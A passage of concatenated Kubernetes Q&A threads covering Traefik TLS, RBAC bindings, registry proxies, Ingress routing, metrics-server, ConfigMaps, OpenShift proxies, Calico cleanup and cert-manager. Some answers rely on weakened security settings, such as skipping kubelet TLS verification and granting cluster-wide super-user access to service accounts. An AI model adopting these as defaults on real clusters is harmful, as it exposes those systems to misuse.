namespace: ingress-prod
annotations:
service.beta.kubernetes.io/aws-load-balancer-backend-protocol: http
service.beta.kubernetes.io/aws-load-balancer-ssl-cert: arn:aws:acm:xxxx
service.beta.kubernetes.io/aws-load-balancer-ssl-ports: https
spec:
selector:
k8s-app: traefik-ingress-lb
ports:
- name: http
port: 80
targetPort: http
protocol: TCP
- name: https
port: 443
targetPort: http
protocol: TCP
type: LoadBalancer
</code></pre>
| <p>The first one is the toml <code>Traefik</code> configuration file, that can be modified in Kubernetes through a ConfigMap or in the Traefik container itself, or in the Traefik container command line (depending on how you deployed the Traefik Ingress Controller).</p>
<p>The second is what is mostly used to manage the configuration in the Traefik Ingress Controller through the <a href="https://kubernetes.io/docs/concepts/services-networking/ingress/" rel="nofollow noreferrer"><code>Ingress</code></a> Kubernetes resource.</p>
<p>You didn't post your Ingress definition but most likely it doesn't have a way to handle HTTPS and that's why when you add the annotation it sends traffic to port <code>443</code> and Traefik returns a <code>404</code>.</p>
<p>To handle HTTPS/TLS you would need to <a href="https://docs.traefik.io/user-guide/kubernetes/#add-a-tls-certificate-to-the-ingress" rel="nofollow noreferrer">enable it first</a> (Create a K8s cert secret, configure TLS in the Ingress, etc). Or <a href="https://medium.com/@dusansusic/traefik-ingress-controller-for-k8s-c1137c9c05c4" rel="nofollow noreferrer">this is another example</a> on how to enable it using a ConfigMap.</p>
|
<p>My objective is to run the following command:</p>
<pre><code>sudo pachctl deploy google ${BUCKET_NAME} ${STORAGE_SIZE} --dynamic-etcd-nodes=1
</code></pre>
<p>I face an error about permissions that I have(posted at last). So, I wanted to create my role via the following command:</p>
<pre><code>sudo kubectl create clusterrolebinding aviralsrivastava-cluster-admin-binding --clusterrole=cluster-admin [email protected]
</code></pre>
<p>However, the above command is yielding me an error:</p>
<pre><code>Error from server (Forbidden): clusterrolebindings.rbac.authorization.k8s.io is forbidden: User "[email protected]" cannot create clusterrolebindings.rbac.authorization.k8s.io at the cluster scope: Required "container.clusterRoleBindings.create" permission.
</code></pre>
| <p>You need to apply following RBAC permission as a <code>cluster-admin</code> to provide permission to user <code>[email protected]</code> for creating clusterRole and clusterRoleBinding:</p>
<p>ClusterRole.yaml</p>
<pre><code>apiVersion: rbac.authorization.k8s.io/v1beta1
kind: ClusterRole
metadata:
name: prom-admin
rules:
# Just an example, feel free to change it
- apiGroups: [""]
resources: ["clusterRole", "clusterRoleBinding"]
verbs: ["get", "watch", "list", "create", "update", "patch", "delete"]
</code></pre>
<p>ClusterRoleBinding.yaml</p>
<pre><code>apiVersion: rbac.authorization.k8s.io/v1beta1
kind: ClusterRoleBinding
metadata:
name: prom-rbac
subjects:
- kind: User
name: [email protected]
roleRef:
kind: ClusterRole
name: prom-admin
apiGroup: rbac.authorization.k8s.io
</code></pre>
|
<p>IS it possible to create custom resource definition by reading the data from yaml file and using <a href="https://github.com/kubernetes-client/java" rel="nofollow noreferrer">Java client</a> for Kubernetes?
I am using the version of library 3.0.0 in sbt and with Scala. But I was not able to find any kind of methods for custom resources creation in the main library repository while there are similar methods for the basic resources (like pods)</p>
| <p>Yes, But not only with java client.
So first use some lib to read yaml and convert it to JSON.
And then USe K8s <a href="https://github.com/kubernetes-client/java/blob/master/kubernetes/src/test/java/io/kubernetes/client/apis/CustomObjectsApiTest.java" rel="nofollow noreferrer">api for Custom Resource Object</a> or what ever you want to do.</p>
|
<p>I have couple of namespaces - assume <code>NS1</code> and <code>NS2</code>. I have serviceaccounts created in those - <code>sa1</code> in <code>NS1</code> and <code>sa2</code> in <code>NS2</code>. I have created roles and rolebindings for <code>sa1</code> to do stuff within <code>NS1</code> and <code>sa2</code> within <code>NS2</code>.
What I want is give <code>sa1</code> certain access within <code>NS2</code> (say only Pod Reader role).</p>
<p>I am wondering if that's possible or not? </p>
| <p>You can simply reference a ServiceAccount from another namespace in the RoleBinding:</p>
<pre><code>apiVersion: rbac.authorization.k8s.io/v1beta1
kind: Role
metadata:
name: pod-reader
namespace: ns2
rules:
- apiGroups: [""]
resources: ["pods"]
verbs: ["get", "list", "watch"]
---
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
name: pod-reader-from-ns1
namespace: ns2
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: Role
name: pod-reader
subjects:
- kind: ServiceAccount
name: ns1-service-account
namespace: ns1
</code></pre>
|
<p>Is there anyway to proxy or mirror the following Docker registries with my own Private Docker Registry?</p>
<ul>
<li>Google Container Registry</li>
<li>AWS EC2 Container Registry</li>
<li>Azure Container Registry</li>
<li>Quay.io</li>
<li>DockerHub</li>
</ul>
<p>I want to use a Private Registry to store all Docker Images I need.
I want to pull Images without changing the <code>repo/image:tag</code> name when doing a docker pull? For example, with Nexus if I want to do a:</p>
<p><code>docker pull gcr.io/google_containers/metrics-server-amd64:v0.2.1</code></p>
<p>I must change the repo name:</p>
<p><code>docker pull mynexus.mycompany.com/google_containers/metrics-server-amd64:v0.2.1</code></p>
<p>Is there any docker/kubernetes config that says if someeone does a pull if a <code>gcr.io</code> Image just go to <code>mynexus.mycompany.com</code> instead and use as a pass thru cache.</p>
| <p>GCR, ECR, ACR and Quay.io not supported current docker</p>
<p>Try this proxy</p>
<p><a href="https://github.com/rpardini/docker-registry-proxy" rel="nofollow noreferrer">https://github.com/rpardini/docker-registry-proxy</a></p>
<p><a href="https://github.com/rpardini/docker-caching-proxy-multiple-private" rel="nofollow noreferrer">https://github.com/rpardini/docker-caching-proxy-multiple-private</a></p>
|
<p>Here is my use case:
We have a customer, where each of their services has to be available on dedicated subdomain. Naming convention should be <code>service-name.customerdomain.com</code>, where <code>service-name</code> is the deployed service and <code>customerdomain.com</code> is the customer domain. When a new service is created, it should be available <strong>automatically</strong>, i.e. once <code>service-name</code> service is deployed into the cluster, it has to be available on <code>service-name.customerdomain.com</code>.</p>
<p>I know, this can be achieved <strong>manually</strong> by following steps:</p>
<ol>
<li><p>Add Ingress controller to the cluster </p></li>
<li><p>Create wildcard DNS <code>*.customerdomain.com</code> and point it to the
Ingress controller</p></li>
<li>Map subdomain for each running service. For every existing service from the cluster create a separate section into Ingress resource file <code>ingress.yaml</code>, e.g.</li>
</ol>
<blockquote>
<pre><code>Spec:
rules:
- host: helloworld.awesome-customer.com
http:
paths:
- path: /*
backend:
serviceName: helloworld
servicePort: 8080
- host: nextfineapp.awesome-customer.com
http:
paths:
- path: /*
backend:
serviceName: nextfineapp
servicePort: 8080
- [...]
</code></pre>
</blockquote>
<ol start="4">
<li>Add Ingress resource file new <code>-host</code> section for each newly
deployed service</li>
<li>Remove Ingress resource file <code>-host</code> section for each removed
service</li>
</ol>
<p>Basically - I would like to automate steps 4 & 5. I am aware Ingress cannot handle this by itself, however, googling around, it appears that updating <code>ingress.yaml</code> file each time a new service is deployed / an existing one is removed can be achieved via <a href="https://helm.sh/" rel="nofollow noreferrer">Helm</a> and its values files.</p>
<p>I would appreciate if a sample solution can be pointed out / described below.</p>
| <p>You would generally do this by having a template for the Ingress resource as a part of your base application chart. You can have more than one Ingress object and they will all get muxed at run time to build the routing table for your controller.</p>
|
<p>executing the command <code>kubectl get --raw /apis/metrics.k8s.io/v1beta1</code>
it returned <code>Error from server (ServiceUnavailable): the server is currently unable to handle the request</code></p>
<p>view the logs from metrics-server</p>
<p><code>http: TLS handshake error from 192.168.133.64:51926:EOF</code></p>
<p>kubelet version is 1.12.3</p>
<p>metrics-server 0.3.1</p>
<p>i have another clusters-set with the same version and configuration, metrics-server works just fine</p>
<p>part of metrics-server-deployment:
<code>
containers:
- name: metrics-server
image: k8s.gcr.io/metrics-server-amd64:v0.3.1
imagePullPolicy: Always
command:
- /metrics-server
- --kubelet-insecure-tls
volumeMounts:
- name: tmp-dir
mountPath: /tmp
</code></p>
| <p>Looks like it is failing because the hostname resolution happens through the internal DNS system which have pods/service entries but not cluster node entries.</p>
<p>Try running your metrics-server with following arguments:</p>
<pre><code>- command:
- /metrics-server
- --kubelet-insecure-tls
- --kubelet-preferred-address-types=InternalIP
</code></pre>
<p>It should work for you as well.</p>
<p>For more info you can look at the following issue <a href="https://github.com/kubernetes-incubator/metrics-server/issues/131" rel="nofollow noreferrer">here</a></p>
<p>Hope this helps.</p>
|
<p>I've this <code>quartz.properties</code> file into <code>src/main/resources</code> folder project:</p>
<pre><code>org.quartz.jobStore.class = net.joelinn.quartz.jobstore.RedisJobStore
org.quartz.jobStore.host = redisbo
</code></pre>
<p>As you can see, I need to change <code>org.quartz.jobStore.host</code> according to current environment.</p>
<p>I mean, according to the environment my project has to be deployed, this value has to change as well.</p>
<p>All my environment are on kubernetes/openshift.</p>
<p>I don't quite figure out how to create a configmap in order to map this property of my <code>src/main/resources/quartz.properties</code>.</p>
<p>Any ideas?</p>
| <p>I think you can configure as following steps.</p>
<ul>
<li><p>Create <code>configmap</code> using <code>quartz.properties</code> file as follows.</p>
<pre>
# kubectl create configmap quartz-config --from-file=quartz.properties
</pre></li>
<li><p>set the volume as <code>configmap</code> created as follows.</p>
<pre>
apiVersion: v1
kind: Pod
metadata:
name: test
spec:
containers:
- name: test-container
image: k8s.gcr.io/busybox
command: [ "/bin/sh", "-c", "ls /src/main/resources" ]
volumeMounts:
- name: config-volume
mountPath: /src/main/resources
volumes:
- name: config-volume
configMap:
name: quartz-config
restartPolicy: Never
</pre></li>
</ul>
|
<p>When i run</p>
<pre><code>oc import-image centos:7 --confirm true
</code></pre>
<p>I am getting</p>
<pre><code>The import completed with errors.
Name: centos
Namespace: pd-kube-ci
Created: Less than a second ago
Labels: <none>
Annotations: openshift.io/image.dockerRepositoryCheck=2018-12-27T21:00:26Z
Docker Pull Spec: docker-registry.default.svc:5000/pd-kube-ci/centos
Image Lookup: local=false
Unique Images: 0
Tags: 1
7
tagged from centos:7
! error: Import failed (InternalError): Internal error occurred: Get https://registry-1.docker.io/v2/: proxyconnect tcp: EOF
Less than a second ago
error: tag 7 failed: Internal error occurred: Get https://registry-1.docker.io/v2/: proxyconnect tcp: EOF
</code></pre>
<p>For the life of me, i cannot find the source of <code>proxyconnect tcp: EOF</code>. Its not found anywhere in the OpenShift/Kubernetes source. Google knows next to nothing about that.</p>
<p>I have also verified that i can <code>docker pull centos</code> from each node (including master and infra nodes). Its only when openshift tries to pull that image.</p>
<p>Any ideas?</p>
| <p>Turns out it was a mis-configuration in our <code>openshift_https_proxy</code> ansible var. Specifically we had:</p>
<pre><code>openshift_https_proxy=https://proxy.mycompany.com:8443
</code></pre>
<p>And we should have had</p>
<pre><code>openshift_https_proxy=http://proxy.mycompany.com:8443
</code></pre>
<p>To fix this, we had to edit <code>/etc/origin/master/master.env</code> on the masters and <code>/etc/sysconfig/docker</code> on all nodes, then restart per the <a href="https://docs.okd.io/3.11/install_config/http_proxies.html" rel="nofollow noreferrer">Working with HTTP Proxies</a> documentation.</p>
|
<p>Currently, I am working on AWS, ASG (AutoScale Group) and Kubernetes. In the infra, I created one Kubernetes cluster in which there is one master node and another one is a Worker node. </p>
<p>Now my question in case high traffic volume I used the HPA at pod level but it might also possible that this node is not able to handle all the requests. </p>
<p>So in this case, will ASG will create a new node or not.
If no then can someone suggest be the best way for horizontal scaling at the node level. </p>
<p>Thanks </p>
| <p>You can do a couple of things:</p>
<ul>
<li><p>Setup <a href="https://docs.aws.amazon.com/autoscaling/ec2/userguide/as-scale-based-on-demand.html#as-scaling-types" rel="nofollow noreferrer">Dynamic scaling</a> for your ASG to autoscale based on CloudWatch metrics (CPU, Mem) or your own metrics with your own automation.</p></li>
<li><p>Use the Kubernetes <a href="https://github.com/kubernetes/autoscaler/tree/master/cluster-autoscaler" rel="nofollow noreferrer">cluster autoscaler</a> so that it autoscales based on not having enough pod capacity on your nodes.</p></li>
</ul>
|
<p>I understand the principle of Ingress, how it routes to services by feeding an Ingress resource to the Ingress controller. </p>
<p>I use Docker for mac with the following Ingress controller: <a href="https://github.com/kubernetes/ingress-nginx/blob/master/docs/deploy/index.md#docker-for-mac" rel="nofollow noreferrer">https://github.com/kubernetes/ingress-nginx/blob/master/docs/deploy/index.md#docker-for-mac</a></p>
<p>There is just one thing I don't quite understand, and that is what type of service you are supposed to use. </p>
<p>Is it ok to use replica sets as you would do with regular load balancer services, and should you provide a resource of 'Kind' 'service' while omitting the 'spec/type' attribute in the service resource altogether? </p>
| <p>For your apps use a Service of type ClusterIP as you would for a cluster-internal Service. This is because they are now internal and it is only the ingress controller which is external. See examples in <a href="https://kubernetes.io/docs/concepts/services-networking/ingress/" rel="nofollow noreferrer">https://kubernetes.io/docs/concepts/services-networking/ingress/</a></p>
<p>For the Ingress controller itself you typically use LoadBalancer but it is your choice how you expose themselves ingress controller externally. You can use NodePort if that suits your cluster (e.g. it is on-prem). In that docker for Mac example the ingress controller is LoadBalancer type - <a href="https://raw.githubusercontent.com/kubernetes/ingress-nginx/master/deploy/provider/cloud-generic.yaml" rel="nofollow noreferrer">https://raw.githubusercontent.com/kubernetes/ingress-nginx/master/deploy/provider/cloud-generic.yaml</a> This is typically used for cloud providers but docker for Mac supports it - <a href="https://stackoverflow.com/questions/49480737/docker-for-macedge-kubernetes-loadbalancer">Docker for Mac(Edge) - Kubernetes - LoadBalancer</a></p>
|
<p>I am trying to set up ingress-nginx-controller with type as <em>LoadBalancer</em>
using <a href="https://kubernetes.github.io/ingress-nginx/deploy/#elastic-load-balancer-elb" rel="nofollow noreferrer">this</a> guide for the configuration.<br>
Couple of issues I'm observing -<br>
issue#1) It does not create and deploy a ELB onto the AWS.<br>
issue#2) The <em>External-IP</em> status is showing as pending for ever. </p>
<pre><code>$ kubectl get services -n ingress-nginx
NAME TYPE CLUSTER-IP EXTERNAL-IP PORT(S) AGE
ingress-nginx LoadBalancer 10.108.245.210 <pending> 80:30742/TCP,443:31028/TCP 41m
</code></pre>
<p>I've followed each step mentioned there </p>
<pre><code>kubectl apply -f https://raw.githubusercontent.com/kubernetes/ingress-nginx/master/deploy/mandatory.yaml
kubectl apply -f https://raw.githubusercontent.com/kubernetes/ingress-nginx/master/deploy/provider/aws/service-l4.yaml
kubectl apply -f https://raw.githubusercontent.com/kubernetes/ingress-nginx/master/deploy/provider/aws/patch-configmap-l4.yaml
</code></pre>
<p>here is the logs from the pod - </p>
<pre><code>~$ kubectl get pods -n ingress-nginx
NAME READY STATUS RESTARTS AGE
default-http-backend-7b8bdbc579-5tgd5 1/1 Running 0 5h57m
nginx-ingress-controller-766c77b7d4-w6wkk 1/1 Running 1 6h16m
$ kubectl logs -n ingress-nginx nginx-ingress-controller-766c77b7d4-w6wkk | more
-------------------------------------------------------------------------------
NGINX Ingress controller
Release: 0.21.0
Build: git-b65b85cd9
Repository: https://github.com/aledbf/ingress-nginx
-------------------------------------------------------------------------------
nginx version: nginx/1.15.6
W1228 06:50:15.592738 7 client_config.go:548] Neither --kubeconfig nor --master was specified. Using the inClusterConfig. This might not work.
I1228 06:50:15.593115 7 main.go:196] Creating API client for https://10.96.0.1:443
I1228 06:50:15.699540 7 main.go:240] Running in Kubernetes cluster version v1.13 (v1.13.1) - git (clean) commit eec55b9ba98609a46fee712359c7b5b365bdd920 - platfo$
m linux/amd64
I1228 06:50:16.060958 7 nginx.go:258] Starting NGINX Ingress controller
I1228 06:50:16.098387 7 event.go:221] Event(v1.ObjectReference{Kind:"ConfigMap", Namespace:"ingress-nginx", Name:"nginx-configuration", UID:"60a8d471-0a6c-11e9-9$
55-024a9b465fb2", APIVersion:"v1", ResourceVersion:"1425", FieldPath:""}): type: 'Normal' reason: 'CREATE' ConfigMap ingress-nginx/nginx-configuration
I1228 06:50:16.098548 7 event.go:221] Event(v1.ObjectReference{Kind:"ConfigMap", Namespace:"ingress-nginx", Name:"tcp-services", UID:"60acc5c1-0a6c-11e9-9a55-024$
9b465fb2", APIVersion:"v1", ResourceVersion:"1426", FieldPath:""}): type: 'Normal' reason: 'CREATE' ConfigMap ingress-nginx/tcp-services
I1228 06:50:16.103229 7 event.go:221] Event(v1.ObjectReference{Kind:"ConfigMap", Namespace:"ingress-nginx", Name:"udp-services", UID:"60ae5849-0a6c-11e9-9a55-024$
9b465fb2", APIVersion:"v1", ResourceVersion:"1428", FieldPath:""}): type: 'Normal' reason: 'CREATE' ConfigMap ingress-nginx/udp-services
I1228 06:50:17.262403 7 nginx.go:279] Starting NGINX process
I1228 06:50:17.263106 7 leaderelection.go:187] attempting to acquire leader lease ingress-nginx/ingress-controller-leader-nginx...
I1228 06:50:17.267252 7 controller.go:172] Configuration changes detected, backend reload required.
I1228 06:50:17.280698 7 leaderelection.go:196] successfully acquired lease ingress-nginx/ingress-controller-leader-nginx
I1228 06:50:17.281401 7 status.go:148] new leader elected: nginx-ingress-controller-766c77b7d4-w6wkk
I1228 06:50:18.113969 7 controller.go:190] Backend successfully reloaded.
I1228 06:50:18.114768 7 controller.go:202] Initial sync, sleeping for 1 second.
[28/Dec/2018:06:50:19 +0000]TCP200000.000
I1228 06:51:07.572896 7 event.go:221] Event(v1.ObjectReference{Kind:"ConfigMap", Namespace:"ingress-nginx", Name:"nginx-configuration", UID:"60a8d471-
0a6c-11e9-9a55-024a9b465fb2", APIVersion:"v1", ResourceVersion:"1783", FieldPath:""}): type: 'Normal' reason: 'UPDATE' ConfigMap ingress-nginx/nginx-configu
ration
I1228 06:51:07.995982 7 controller.go:172] Configuration changes detected, backend reload required.
I1228 06:51:12.846822 7 controller.go:190] Backend successfully reloaded.
[28/Dec/2018:06:51:13 +0000]TCP200000.000
W1228 10:14:17.301340 7 queue.go:130] requeuing &ObjectMeta{Name:sync status,GenerateName:,Namespace:,SelfLink:,UID:,ResourceVersion:,Generation:0,Cre
ationTimestamp:0001-01-01 00:00:00 +0000 UTC,DeletionTimestamp:<nil>,DeletionGracePeriodSeconds:nil,Labels:map[string]string{},Annotations:map[string]string
{},OwnerReferences:[],Finalizers:[],ClusterName:,Initializers:nil,}, err services "ingress-nginx" not found
W1228 10:14:17.313074 7 queue.go:130] requeuing &ObjectMeta{Name:sync status,GenerateName:,Namespace:,SelfLink:,UID:,ResourceVersion:,Generation:0,Cre
ationTimestamp:0001-01-01 00:00:00 +0000 UTC,DeletionTimestamp:<nil>,DeletionGracePeriodSeconds:nil,Labels:map[string]string{},Annotations:map[string]string
{},OwnerReferences:[],Finalizers:[],ClusterName:,Initializers:nil,}, err services "ingress-nginx" not found
W1228 10:14:17.320110 7 queue.go:130] requeuing &ObjectMeta{Name:sync status,GenerateName:,Namespace:,SelfLink:,UID:,ResourceVersion:,Generation:0,Cre
ationTimestamp:0001-01-01 00:00:00 +0000 UTC,DeletionTimestamp:<nil>,DeletionGracePeriodSeconds:nil,Labels:map[string]string{},Annotations:map[string]string
{},OwnerReferences:[],Finalizers:[],ClusterName:,Initializers:nil,}, err services "ingress-nginx" not found
<truncated>
</code></pre>
<p>The above error shows that service is not running properly. No event also showing up in describe service output- </p>
<pre><code>~$ kubectl get service -n ingress-nginx
NAME TYPE CLUSTER-IP EXTERNAL-IP PORT(S) AGE
default-http-backend ClusterIP 10.100.2.163 <none> 80/TCP 5h49m
ingress-nginx LoadBalancer 10.108.221.18 <pending> 80:32010/TCP,443:31271/TCP 170m
$kubectl describe service ingress-nginx -n ingress-nginx
Name: ingress-nginx
Namespace: ingress-nginx
Labels: app.kubernetes.io/name=ingress-nginx
app.kubernetes.io/part-of=ingress-nginx
Annotations: kubectl.kubernetes.io/last-applied-configuration:
{"apiVersion":"v1","kind":"Service","metadata":{"annotations":{"service.beta.kubernetes.io/aws-load-balancer-type":"nlb"},"label
s":{"app.k...
service.beta.kubernetes.io/aws-load-balancer-type: nlb
Selector: app.kubernetes.io/name=ingress-nginx,app.kubernetes.io/part-of=ingress-nginx
Type: LoadBalancer
IP: 10.108.221.18
Port: http 80/TCP
TargetPort: http/TCP
NodePort: http 32010/TCP
Endpoints: 10.244.0.4:80
Port: https 443/TCP
TargetPort: https/TCP
NodePort: https 31271/TCP
Endpoints: 10.244.0.4:443
Session Affinity: None
External Traffic Policy: Local
HealthCheck NodePort: 30401
Events: <none>
</code></pre>
<p>I know there is a service specification tag <em>externalIPs</em> but expectation here is that once ELB instance is created, it will be auto populated -</p>
<pre><code>spec:
type: LoadBalancer
externalIPs:
- {{ ingress_lb_address or vip or masterIP }}
</code></pre>
<p>Please let me know if anything I'm missing here.</p>
| <p>Found the root casue. <em>cloud provider</em> tag is missing from all resources in the cluster. </p>
<pre><code>~$ kubectl cluster-info dump | grep LoadBalancer
E1228 14:35:47.072444 1 core.go:76] Failed to start service controller: WARNING: no cloud provider provided, services of type LoadBalancer will fail
</code></pre>
|
<p>I am building my docker image with jenkins using:</p>
<pre><code>docker build --build-arg VCS_REF=$GIT_COMMIT \
--build-arg BUILD_DATE=`date -u +"%Y-%m-%dT%H:%M:%SZ"` \
--build-arg BUILD_NUMBER=$BUILD_NUMBER -t $IMAGE_NAME\
</code></pre>
<p>I was using Docker but I am migrating to k8.</p>
<p>With docker I could access those labels via:</p>
<pre><code>docker inspect --format "{{ index .Config.Labels \"$label\"}}" $container
</code></pre>
<p><b>How can I access those labels with Kubernetes ?</b></p>
<p>I am aware about adding those labels in .Metadata.labels of my yaml files but I don't like it that much because
- it links those information to the deployment and not the container itself<BR>
- can be modified anytime<BR>
...</p>
<pre><code>kubectl describe pods
</code></pre>
<p>Thank you</p>
| <p>Kubernetes doesn't expose that data. If it did, it would be part of the <a href="https://kubernetes.io/docs/reference/generated/kubernetes-api/v1.13/#podstatus-v1-core" rel="nofollow noreferrer">PodStatus</a> API object (and its embedded <a href="https://kubernetes.io/docs/reference/generated/kubernetes-api/v1.13/#containerstatus-v1-core" rel="nofollow noreferrer">ContainerStatus</a>), which is one part of the <a href="https://kubernetes.io/docs/reference/generated/kubernetes-api/v1.13/#pod-v1-core" rel="nofollow noreferrer">Pod</a> data that would get dumped out by <code>kubectl get pod deployment-name-12345-abcde -o yaml</code>.</p>
<p>You might consider encoding some of that data in the Docker image tag; for instance, if the CI system is building a tagged commit then use the source control tag name as the image tag, otherwise use a commit hash or sequence number. Another typical path is to use a deployment manager like <a href="https://helm.sh" rel="nofollow noreferrer">Helm</a> as the principal source of truth about deployments, and if you do that there can be a path from your CD system to Helm to Kubernetes that can pass along labels or annotations. You can also often set up software to know its own build date and source control commit ID at build time, and then expose that information via an informational-only API (like an HTTP <code>GET /_version</code> call or some such).</p>
|
<p>Quick question regarding Kubernetes job status.</p>
<p>Lets assume I submit my resource to 10 PODS and want to check if my JOB is completed successfully.</p>
<p>What is the best available options that we can use from KUBECTL commands.</p>
<p>I think of kubectl get jobs but the problem here is you have only two codes 0 & 1. 1 for completion 0 for failed or running, we cannot really depend on this</p>
<p>Other option is kubectl describe to check the PODS status like out of 10 PODS how many are commpleted/failed.</p>
<p>Any other effective way of monitoring the PODs? Please let me know</p>
| <p>Anything that can talk to the Kubernetes API can query for Job object and look at the <code>JobStatus</code> field, which has info on which pods are running, completed, failed, or unavailable. <code>kubectl</code> is probably the easiest, as you mentioned, but you could write something more specialized using any client library if you wanted/needed to.</p>
|
<p>I install kubernetes v1.11.5 from kubeadm with cni plugin flannel and everything is ok. But I after try to switch to calico I found that the cross machine pod communication is broken. So I switch back to flannel. But got error message when creating pod:</p>
<p><a href="https://i.stack.imgur.com/V8dN5.png" rel="nofollow noreferrer"><img src="https://i.stack.imgur.com/V8dN5.png" alt="enter image description here"></a></p>
<p>It seems that I need to reset cni network? But I don't know how to solve this problem. </p>
<p>My flannel and calico installation is follow <a href="https://kubernetes.io/docs/setup/independent/create-cluster-kubeadm/" rel="nofollow noreferrer">kubeadm instruction</a> with zero config update.</p>
| <p>I use following steps to remove old calico configs from kubernetes without <code>kubeadm reset</code>:</p>
<ol>
<li>clear ip route: <code>ip route flush proto bird</code></li>
<li>remove all calico links in all nodes <code>ip link list | grep cali | awk '{print $2}' | cut -c 1-15 | xargs -I {} ip link delete {}</code></li>
<li>remove ipip module <code>modprobe -r ipip</code></li>
<li>remove calico configs <code>rm /etc/cni/net.d/10-calico.conflist && rm /etc/cni/net.d/calico-kubeconfig</code></li>
<li>restart kubelet <code>service kubelet restart</code></li>
</ol>
<p>After those steps all the running pods won't be connect, then I have to delete all the pods, then all the pods works. This has litter influence if you are using <code>replicaset</code>.</p>
|
<p>I am confused to understand the usage of Kubernetes in AWS, when AWS already has a similar service ECS for a while. ECS also does a good job in container orchestration via json/yaml file. What are the advantages of kubernetes over ECS? </p>
| <p>Both are container orchestration services. ECS is very well integrated with other Amazon Web Services. Kubernetes is cloud-neutral. You can find a good overview <a href="https://kubernetes.io/docs/concepts/overview/what-is-kubernetes/" rel="noreferrer">here</a> </p>
<p>Your requirements should tell you which one makes more sense for your needs. Here are some tips to help you understand how each product is positioned. Of course, there's a lot of overlapping and both products are very able to run a production workload.</p>
<p>Go Kubernetes (or <a href="https://aws.amazon.com/eks/" rel="noreferrer">EKS</a>, the AWS Managed Kubernetes service) if:</p>
<ul>
<li>You want cloud portability;</li>
<li>You want to deploy on-premise;</li>
<li>You want your developers to use the same tools that run your production workload.</li>
</ul>
<p>Go <a href="https://aws.amazon.com/ecs/" rel="noreferrer">ECS</a> (or <a href="https://aws.amazon.com/fargate/" rel="noreferrer">Fargate</a>, its managed version) if:</p>
<ul>
<li><p>You are comfortable configuring AWS (eg: auto-scaling groups, VPCs, elastic load balancers...);</p></li>
<li><p>You already have a workload running on EC2 and is gradually migrating it to containers;</p></li>
<li><p>You look for a service that is easier to learn; </p></li>
</ul>
|
<p>I have a spring boot web app which simply prints a property that is passed in a Kubernetes' ConfigMap.</p>
<p>This is my main class:</p>
<pre><code>@SpringBootApplication
@EnableDiscoveryClient
@RestController
public class DemoApplication {
private MyConfig config;
private DiscoveryClient discoveryClient;
@Autowired
public DemoApplication(MyConfig config, DiscoveryClient discoveryClient) {
this.config = config;
this.discoveryClient = discoveryClient;
}
@RequestMapping("/")
public String info() {
return config.getMessage();
}
public static void main(String[] args) {
SpringApplication.run(DemoApplication.class, args);
}
@RequestMapping("/services")
public String services() {
StringBuilder b = new StringBuilder();
discoveryClient.getServices().forEach((s) -> b.append(s).append(" , "));
return b.toString();
}
}
</code></pre>
<p>and the <code>MyConfig</code> class is:</p>
<pre><code>@Configuration
@ConfigurationProperties(prefix = "bean")
public class MyConfig {
private String message = "a message that can be changed live";
public String getMessage() {
return message;
}
public void setMessage(String message) {
this.message = message;
}
}
</code></pre>
<p>Basically, by invoking root resource I always get:</p>
<blockquote>
<p>a message that can be changed live</p>
</blockquote>
<p>And invoking /services I actually get a list of Kubernetes services.</p>
<p>I'm creating the ConfigMap with <code>kubectl create -f configmap-demo.yml</code> being the content:</p>
<pre><code>apiVersion: v1
kind: ConfigMap
metadata:
name: demo
data:
bean.message: This is an info from k8
</code></pre>
<p>And the deployment with <code>kubecetl create -f deploy-demo.yml</code> and the content is:</p>
<pre><code>apiVersion: apps/v1
kind: Deployment
metadata:
name: demo
labels:
app: demo
spec:
replicas: 1
selector:
matchLabels:
app: demo
template:
metadata:
labels:
app: demo
spec:
# this service account was created according to
# https://kubernetes.io/docs/reference/access-authn-authz/rbac/#service-account-permissions
# point 5 - Grant super-user access to all service accounts cluster-wide (strongly discouraged)
serviceAccountName: i18n-spring-k8
containers:
- name: demo
image: aribeiro/sck-demo
imagePullPolicy: Never
env:
- name: JAVA_OPTS
value:
ports:
- containerPort: 8080
volumes:
- name: demo
configMap:
name: demo
</code></pre>
<p>The problem is that when accessing the root resource <code>/</code> I always get the default hardcoded value and never what is defined in Kubernetes' ConfigMap.</p>
<p>Example project also with yaml files and Docker file available at <a href="https://drive.google.com/open?id=107IcwnYIbVpmwVgdgi8Dhx4nHEFAVxV8" rel="nofollow noreferrer">https://drive.google.com/open?id=107IcwnYIbVpmwVgdgi8Dhx4nHEFAVxV8</a> .</p>
<p>Also checked the startup DEBUG logs and I don't see any error or clue why it should not work.</p>
| <p>The <a href="https://github.com/spring-cloud/spring-cloud-kubernetes/blob/master/README.adoc#kubernetes-propertysource-implementations" rel="noreferrer">Spring Cloud Kubernetes documentation</a> is incomplete. It lacks the instruction to include this dependency to enable loading application properties from ConfigMap's:</p>
<pre><code><dependency>
<groupId>org.springframework.cloud</groupId>
<artifactId>spring-cloud-starter-kubernetes-config</artifactId>
</dependency>
</code></pre>
|
<p>I have been following <a href="https://www.digitalocean.com/community/tutorials/how-to-set-up-an-nginx-ingress-with-cert-manager-on-digitalocean-kubernetes" rel="nofollow noreferrer">this guide</a> to create an nginx-ingress which works fine. </p>
<p>Next I want to create a ClusterIssuer object called letsencrypt-staging, and use the Let's Encrypt staging server but get this error.</p>
<pre><code>kubectl create -f staging_issuer.yaml
</code></pre>
<blockquote>
<p>error: unable to recognize "staging_issuer.yaml": no matches for kind
"ClusterIssuer" in version "certmanager.k8s.io/v1alpha1"</p>
</blockquote>
<p>I have searched for solutions but can't find anything that works for me or that I can understand. What I found is mostly bug reports.</p>
<p>Here is my yaml file I used to create the ClusterIssuer.</p>
<pre><code>apiVersion: certmanager.k8s.io/v1alpha1
kind: ClusterIssuer
metadata:
name: letsencrypt-staging
spec:
acme:
# The ACME server URL
server: https://acme-staging-v02.api.letsencrypt.org/directory
# Email address used for ACME registration
email: your_email_address_here
# Name of a secret used to store the ACME account private key
privateKeySecretRef:
name: letsencrypt-staging
# Enable the HTTP-01 challenge provider
http01: {}
</code></pre>
| <p>I fixed the problem by running <code>helm del --purge cert-manager</code></p>
<p>and then </p>
<pre><code>helm install --name cert-manager --namespace kube-system stable/cert-manager --set createCustomResource=true
</code></pre>
|
<p>I am trying to use sidecar mode in kubernetes to create a logs sidecar to expose specific container logs. And I am using kubernetes client to fetch logs from kubernetes api and send it out by websocket. The code shows below:</p>
<pre><code>func serveWs(w http.ResponseWriter, r *http.Request) {
